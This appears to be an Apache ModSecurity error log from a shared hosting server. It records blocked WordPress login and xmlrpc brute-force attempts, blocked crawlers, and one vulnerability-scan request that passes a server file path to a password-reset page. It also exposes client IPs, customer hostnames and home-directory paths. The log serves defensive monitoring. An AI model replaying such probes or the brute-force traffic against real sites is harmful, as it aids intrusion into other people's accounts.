[Tue May 26 17:35:26.547457 2026] [security2:error] [pid 894579:tid 894694] [remote 123.30.233.13:48760] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahWMhgEtZWuWWBGzl__n-AABDHI"]
[Tue May 26 17:35:26.619525 2026] [security2:error] [pid 894579:tid 894836] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMhgEtZWuWWBGzl__n7wAAAYc"]
[Tue May 26 17:35:27.011449 2026] [security2:error] [pid 894579:tid 894829] [client 223.235.98.214:1593] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWMhgEtZWuWWBGzl__oAAAAAYA"]
[Tue May 26 17:35:27.011603 2026] [security2:error] [pid 894579:tid 894829] [client 223.235.98.214:1593] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWMhgEtZWuWWBGzl__oAAAAAYA"]
[Tue May 26 17:35:28.251662 2026] [security2:error] [pid 894579:tid 894773] [client 114.119.152.32:35439] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "samayikprasanga.in"] [uri "/archive.php"] [unique_id "ahWMiAEtZWuWWBGzl__oGwAAAUg"], referer: https://samayikprasanga.in/epaper.php?pn=5
[Tue May 26 17:35:28.376729 2026] [security2:error] [pid 894579:tid 894822] [client 185.191.171.12:37246] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/homeschoolers-gym/list/"] [unique_id "ahWMiAEtZWuWWBGzl__oHQAAAXk"]
[Tue May 26 17:35:28.376862 2026] [security2:error] [pid 894579:tid 894822] [client 185.191.171.12:37246] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/homeschoolers-gym/list/"] [unique_id "ahWMiAEtZWuWWBGzl__oHQAAAXk"]
[Tue May 26 17:35:28.415468 2026] [security2:error] [pid 891273:tid 891412] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMh8DEzZ8z3jtDm8216gAAAAk"]
[Tue May 26 17:35:29.669955 2026] [security2:error] [pid 894579:tid 894603] [remote 103.95.119.103:38126] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWMiQEtZWuWWBGzl__oLAABGhc"]
[Tue May 26 17:35:30.745226 2026] [security2:error] [pid 891273:tid 891471] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMisDEzZ8z3jtDm822AgAAAEQ"]
[Tue May 26 17:35:31.953702 2026] [security2:error] [pid 891273:tid 891461] [client 94.26.106.125:49535] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 125.106.26.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.acecomputers.co.in.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWMi8DEzZ8z3jtDm822DwAAADo"], referer: https://www.google.com/
[Tue May 26 17:35:32.287309 2026] [security2:error] [pid 891273:tid 891485] [client 94.26.106.125:61988] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 125.106.26.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.acecomputers.co.in.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWMjMDEzZ8z3jtDm822FAAAAFI"], referer: https://wordpress.org/
[Tue May 26 17:35:33.058481 2026] [security2:error] [pid 891273:tid 891403] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMjMDEzZ8z3jtDm822HAAAAAA"]
[Tue May 26 17:35:33.885383 2026] [security2:error] [pid 891273:tid 891395] [remote 46.101.54.125:36750] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 125.54.101.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWMjcDEzZ8z3jtDm822NAAAKnk"]
[Tue May 26 17:35:36.543720 2026] [security2:error] [pid 891273:tid 891501] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMkMDEzZ8z3jtDm822dwAAAGI"]
[Tue May 26 17:35:37.062441 2026] [security2:error] [pid 891273:tid 891291] [remote 209.42.19.17:46466] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.19.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWMkMDEzZ8z3jtDm822lQAAGxE"]
[Tue May 26 17:35:37.372192 2026] [security2:error] [pid 891273:tid 891436] [client 223.235.98.214:14793] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWMkcDEzZ8z3jtDm822owAAACE"]
[Tue May 26 17:35:37.372304 2026] [security2:error] [pid 891273:tid 891436] [client 223.235.98.214:14793] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWMkcDEzZ8z3jtDm822owAAACE"]
[Tue May 26 17:35:38.395912 2026] [security2:error] [pid 894579:tid 894786] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMkQEtZWuWWBGzl__o9gAAAVU"]
[Tue May 26 17:35:40.355308 2026] [security2:error] [pid 894579:tid 894765] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMkwEtZWuWWBGzl__pRQAAAUE"]
[Tue May 26 17:35:41.499098 2026] [security2:error] [pid 891273:tid 891482] [client 47.128.53.150:29044] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.cagmedya.com"] [uri "/robots.txt"] [unique_id "ahWMlcDEzZ8z3jtDm822_wAAAE8"]
[Tue May 26 17:35:41.899272 2026] [security2:error] [pid 894579:tid 894588] [remote 172.104.164.56:45470] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 56.164.104.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWMlQEtZWuWWBGzl__phgABfgg"]
[Tue May 26 17:35:42.956864 2026] [security2:error] [pid 894579:tid 894730] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMlgEtZWuWWBGzl__pqQAAAR4"]
[Tue May 26 17:35:42.970982 2026] [security2:error] [pid 894579:tid 894595] [remote 45.79.189.31:44246] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.189.79.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWMlgEtZWuWWBGzl__puQABYQ8"]
[Tue May 26 17:35:45.306515 2026] [security2:error] [pid 891273:tid 891477] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMmMDEzZ8z3jtDm823PAAAAEo"]
[Tue May 26 17:35:46.600515 2026] [security2:error] [pid 891273:tid 891513] [client 43.173.176.244:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWMmsDEzZ8z3jtDm823TAAAAG4"]
[Tue May 26 17:35:47.883947 2026] [security2:error] [pid 891273:tid 891528] [client 223.235.98.214:33031] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWMm8DEzZ8z3jtDm823aAAAAH0"]
[Tue May 26 17:35:47.885296 2026] [security2:error] [pid 891273:tid 891528] [client 223.235.98.214:33031] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWMm8DEzZ8z3jtDm823aAAAAH0"]
[Tue May 26 17:35:48.312005 2026] [security2:error] [pid 891273:tid 891420] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMm8DEzZ8z3jtDm823ZwAAABE"]
[Tue May 26 17:35:49.604863 2026] [security2:error] [pid 894579:tid 894773] [client 46.105.42.96:26245] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "traderscafe.in"] [uri "/robots.txt"] [unique_id "ahWMnQEtZWuWWBGzl__qQwAAAUg"]
[Tue May 26 17:35:49.604984 2026] [security2:error] [pid 894579:tid 894773] [client 46.105.42.96:26245] ModSecurity: Warning. Matched phrase "MJ12bot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "traderscafe.in"] [uri "/robots.txt"] [unique_id "ahWMnQEtZWuWWBGzl__qQwAAAUg"]
[Tue May 26 17:35:51.016986 2026] [security2:error] [pid 894579:tid 894746] [client 14.191.101.141:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMngEtZWuWWBGzl__qUwAAAS4"]
[Tue May 26 17:35:51.508637 2026] [fcgid:warn] [pid 891273:tid 891411] (70014)End of file found: [client 66.132.195.47:26832] mod_fcgid: can't get data from http client
[Tue May 26 17:35:52.273195 2026] [security2:error] [pid 891273:tid 891480] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMn8DEzZ8z3jtDm823lQAAAE0"]
[Tue May 26 17:35:52.462442 2026] [security2:error] [pid 891273:tid 891469] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMoMDEzZ8z3jtDm823mQAAAEI"]
[Tue May 26 17:35:54.182749 2026] [security2:error] [pid 894579:tid 894798] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMoQEtZWuWWBGzl__qgAAAAWE"]
[Tue May 26 17:35:55.694415 2026] [security2:error] [pid 894579:tid 894721] [client 66.132.195.47:54518] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "tea.canopykaapi.com"] [uri "/index.php"] [unique_id "ahWMowEtZWuWWBGzl__qmwAAARU"]
[Tue May 26 17:35:56.377920 2026] [security2:error] [pid 894579:tid 894663] [remote 103.95.119.103:42206] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWMpAEtZWuWWBGzl__qowABDVM"]
[Tue May 26 17:35:57.180973 2026] [security2:error] [pid 891273:tid 891517] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMpMDEzZ8z3jtDm8233gAAAHI"]
[Tue May 26 17:35:57.337597 2026] [proxy:error] [pid 891273:tid 891486] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:35:57.337674 2026] [proxy_http:error] [pid 891273:tid 891486] [client 23.137.105.206:61832] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:35:57.338275 2026] [proxy:error] [pid 891273:tid 891486] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:35:57.338311 2026] [proxy_http:error] [pid 891273:tid 891486] [client 23.137.105.206:61832] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:35:58.493539 2026] [security2:error] [pid 891273:tid 891475] [client 223.235.98.214:32777] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWMpsDEzZ8z3jtDm8237wAAAEg"]
[Tue May 26 17:35:58.493732 2026] [security2:error] [pid 891273:tid 891475] [client 223.235.98.214:32777] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWMpsDEzZ8z3jtDm8237wAAAEg"]
[Tue May 26 17:35:58.835466 2026] [security2:error] [pid 894579:tid 894797] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMpgEtZWuWWBGzl__qxQAAAWA"]
[Tue May 26 17:36:01.785125 2026] [security2:error] [pid 894579:tid 894793] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMqQEtZWuWWBGzl__q8QAAAVw"]
[Tue May 26 17:36:04.189361 2026] [security2:error] [pid 891273:tid 891510] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMq8DEzZ8z3jtDm824LgAAAGs"]
[Tue May 26 17:36:04.446854 2026] [security2:error] [pid 894579:tid 894690] [remote 49.12.3.147:35776] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.3.12.49.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWMrAEtZWuWWBGzl__rZwABS24"]
[Tue May 26 17:36:06.573370 2026] [security2:error] [pid 894579:tid 894765] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMrgEtZWuWWBGzl__ruAAAAUE"]
[Tue May 26 17:36:08.206644 2026] [autoindex:error] [pid 894579:tid 894830] [client 103.108.58.177:17410] AH01276: Cannot serve directory /home2/whitece9/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:36:08.906204 2026] [security2:error] [pid 894579:tid 894728] [client 223.235.98.214:6675] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWMsAEtZWuWWBGzl__sUgAAARw"]
[Tue May 26 17:36:08.906504 2026] [security2:error] [pid 894579:tid 894728] [client 223.235.98.214:6675] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWMsAEtZWuWWBGzl__sUgAAARw"]
[Tue May 26 17:36:08.988082 2026] [security2:error] [pid 894579:tid 894805] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMsAEtZWuWWBGzl__sQQAAAWg"]
[Tue May 26 17:36:09.472662 2026] [security2:error] [pid 891273:tid 891381] [remote 209.42.18.223:42798] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 223.18.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWMscDEzZ8z3jtDm824ewAAZGs"]
[Tue May 26 17:36:10.509172 2026] [security2:error] [pid 894579:tid 894748] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMsgEtZWuWWBGzl__siwAAATA"]
[Tue May 26 17:36:13.398689 2026] [security2:error] [pid 891273:tid 891418] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMtMDEzZ8z3jtDm824rwAAAA8"]
[Tue May 26 17:36:15.001715 2026] [security2:error] [pid 894579:tid 894678] [remote 74.7.241.58:52928] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahWMtwEtZWuWWBGzl__tVgABXGI"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/afstpaul.org/wp-content/plugins/woocommerce/templates/emails
[Tue May 26 17:36:15.160789 2026] [security2:error] [pid 894579:tid 894816] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMtgEtZWuWWBGzl__tTgAAAXM"]
[Tue May 26 17:36:16.998252 2026] [security2:error] [pid 894579:tid 894638] [remote 51.91.98.45:49276] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWMuAEtZWuWWBGzl__tfAABOjo"]
[Tue May 26 17:36:18.058368 2026] [security2:error] [pid 894579:tid 894787] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMuQEtZWuWWBGzl__tlQAAAVY"]
[Tue May 26 17:36:18.362936 2026] [security2:error] [pid 894579:tid 894744] [client 185.255.126.16:31011] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahWMugEtZWuWWBGzl__toQAAASw"], referer: https://www.glorodrc.com/index.php?route=information/contact
[Tue May 26 17:36:19.088646 2026] [security2:error] [pid 894579:tid 894813] [client 45.15.73.61:42741] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWMugEtZWuWWBGzl__tpwAAAXA"], referer: https://www.cagmedya.com/kayseri-web-tasarim/
[Tue May 26 17:36:19.296819 2026] [security2:error] [pid 891273:tid 891472] [client 223.235.98.214:2487] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWMu8DEzZ8z3jtDm8240AAAAEU"]
[Tue May 26 17:36:19.297402 2026] [security2:error] [pid 891273:tid 891472] [client 223.235.98.214:2487] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWMu8DEzZ8z3jtDm8240AAAAEU"]
[Tue May 26 17:36:19.570239 2026] [core:error] [pid 894579:tid 894716] [client 208.84.100.173:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:36:19.570272 2026] [core:error] [pid 894579:tid 894716] [client 208.84.100.173:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
